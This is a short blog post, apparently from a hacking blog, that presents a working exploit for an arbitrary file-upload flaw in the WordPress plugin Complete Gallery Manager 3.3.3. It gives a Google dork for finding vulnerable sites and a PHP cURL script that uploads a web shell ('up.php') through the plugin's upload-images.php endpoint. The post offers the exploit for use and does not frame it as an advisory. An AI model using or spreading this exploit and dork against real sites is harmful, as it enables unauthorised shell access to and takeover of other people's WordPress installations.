Home Unlabelled Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability

Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability

By
Thursday, May 15, 2014
Read
Add Comment


Things Required:
-XAMPP
-Shell
-Exploit script.php

Dork: inurl/wp-content/plugins/complete-gallery-manager
Shell Uploaded to : http://wordpress.com/wp-content/2013/09/up.php

Exploit :


$uploadfile="up.php";
$ch =
curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
Just watch the video if you still don't understand :)

 
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us